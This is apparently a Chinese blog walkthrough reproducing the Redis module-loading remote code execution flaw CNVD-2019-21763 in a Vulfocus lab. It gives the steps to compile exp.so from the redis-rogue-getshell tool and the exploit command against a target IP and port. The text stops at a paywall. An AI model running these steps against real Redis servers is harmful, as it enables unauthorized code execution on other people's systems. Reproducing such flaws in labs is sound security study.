CNVD-2019-21763
漏洞描述
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。
漏洞复现
靶场环境
利用Vulfocus进行搭建,可以使用在线,也可以使用自己搭建。
Vulfocus在线网址
https://vulfocus.cn/#/dashboard
开启靶场
我这使用是在线Vulfocus环境开启的靶场
使用工具
https://github.com/vulhub/redis-rogue-getshell
下载好工具放到kali中,kali需要有python3的环境
解压后先进入到 RedisModulesSDK目录里面的exp目录下,make编译一下才会产生exp.so文件,后面再利用这个exp.so文件进行远程代码执行
//解压
unzip redis-rogue-getshell-master.zip
//进入目录
cd redis-rogue-getshell-master/RedisModulesSDK/exp/
//编译
make
//回到项目根目录
cd ../../
exp命令
python redis-master.py -r 目标IP -p 目标端口 
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
